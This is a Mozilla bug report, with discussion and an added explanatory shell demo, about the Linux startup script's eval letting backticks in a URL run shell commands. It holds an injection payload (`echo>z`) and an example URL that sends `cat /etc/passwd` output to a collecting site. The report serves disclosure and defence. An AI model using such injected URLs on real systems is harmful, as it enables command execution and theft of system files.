Closed Bug 246524 Opened 21 years ago Closed 16 years ago

mozilla should protect special characters from interpretation by the shell

Categories

(Core Graveyard :: Cmd-line Features, defect)

All
Linux
defect
Not set
normal

Tracking

(Not tracked)

RESOLVED WORKSFORME

People

(Reporter: vincent-moz, Unassigned)

Details

(Whiteboard: [sg:nse])

User-Agent:       Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.7) Gecko/20040609
Build Identifier: Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.7) Gecko/20040609

The mozilla script doesn't protect special characters from being interpreted by
the shell, allowing arbitrary code to be run (in particular when mozilla is
launched by another program).

Reproducible: Always
Steps to Reproduce:
1. In a shell, type
  mozilla -remote 'openurl(http://localhost/`echo>z`,new-tab)'
Actual Results:  
The http://localhost/ URL is opened and a file "z" is created.

Expected Results:  
The file "z" shouldn't have been created.
This bug is still present.

BTW, Debian has a different startup script, with no eval command, so that this
bug doesn't occur.
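The two launcher behaviours discussed above, the eval-based one that re-parses its arguments and the no-eval one the Debian script is said to use, side by side as an added example; this is not the mozilla startup script, run-mozilla.sh, or Debian's wrapper, but a stub that models the bug report. A stub "browser" records the argument it receives; a hypothetical eval-based wrapper hands the argument back to the shell, so the backtick substitution in the reporter's payload executes; a wrapper that forwards "$@" unchanged leaves the backticks as literal URL text. Function names, the scratch directory and the stub are assumptions of the example; the payload is the one from the report.

```shell
#!/bin/sh
# Added example (not the mozilla script): an eval-based launcher next to a
# launcher that forwards "$@" untouched, driven with the payload from the report.

# stub_browser: stands in for the browser binary; prints its first argument
# verbatim so we can see exactly what the launcher delivered to it.
stub_browser() {
    printf '%s\n' "$1"
}

# vulnerable_launch (hypothetical): rebuilds the command line as a string and
# hands it to eval. The shell parses that string a second time, so backticks,
# $(...) and similar inside the URL are expanded before the browser runs.
vulnerable_launch() {
    eval "stub_browser \"$1\""
}

# safe_launch (hypothetical): forwards the positional parameters unchanged.
# The argument is never re-parsed, so `echo>z` stays a literal substring.
safe_launch() {
    stub_browser "$@"
}

# demo_launch: runs one launcher in a scratch directory with the payload from
# the bug report and reports "<argument the browser saw>|<z created: yes/no>".
# The scratch directory is an assumption of the example so that a successful
# substitution creates "z" there instead of in the caller's directory.
demo_launch() {
    launcher=$1
    # Payload exactly as in the report: the URL carries a command substitution.
    payload='openurl(http://localhost/`echo>z`,new-tab)'
    scratch=$(mktemp -d) || return 1
    (
        cd "$scratch" || exit 1
        seen=$("$launcher" "$payload")
        if [ -e z ]; then created=yes; else created=no; fi
        printf '%s|%s\n' "$seen" "$created"
    )
    rm -rf "$scratch"
}

# Stand-alone demonstration: the eval-based launcher runs the embedded command
# (the URL loses the backtick part and "z" appears); the "$@" launcher does not.
printf 'eval launcher: %s\n' "$(demo_launch vulnerable_launch)"
printf 'safe launcher: %s\n' "$(demo_launch safe_launch)"
```

The eval form reproduces the report: the browser receives http://localhost/ with the substitution already stripped out, and the side effect (creating "z") has happened in the launcher's working directory. The "$@" form delivers the backticks as data, which is the whole fix; the same reasoning covers the `cat /etc/passwd` variant, since any command substitution in the URL is either executed by eval or passed through as text.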
Hardware: Macintosh → All
Not a remote exploit, clearing confidential flag to hopefully gain some visibility.
Group: security
Severity: critical → normal
Status: UNCONFIRMED → NEW
Ever confirmed: true
Whiteboard: [sg:nse]
I disagree. It can be a remote exploit with user interaction. A click in your
RSS feed reader to open a URL can be sufficient. Of course, I always check the
URL before doing that, but I don't think every user does that.
It can even lead to information leak toward the site, imagine what the following
URL will do
http://www.mysite.tld/cgi-bin/collect.cgi?pass=`cat /etc/passwd`

Any chance of this getting fixed?  Doesn't seem like it should be too hard; just
use Debian's script as a reference.
Pretty sure this got fixed at some point: it certainly WFM with mozilla-central.
Status: NEW → RESOLVED
Closed: 16 years ago
Resolution: --- → WORKSFORME
Product: Core → Core Graveyard
Yes, the script from FF 3.5b4 looks OK.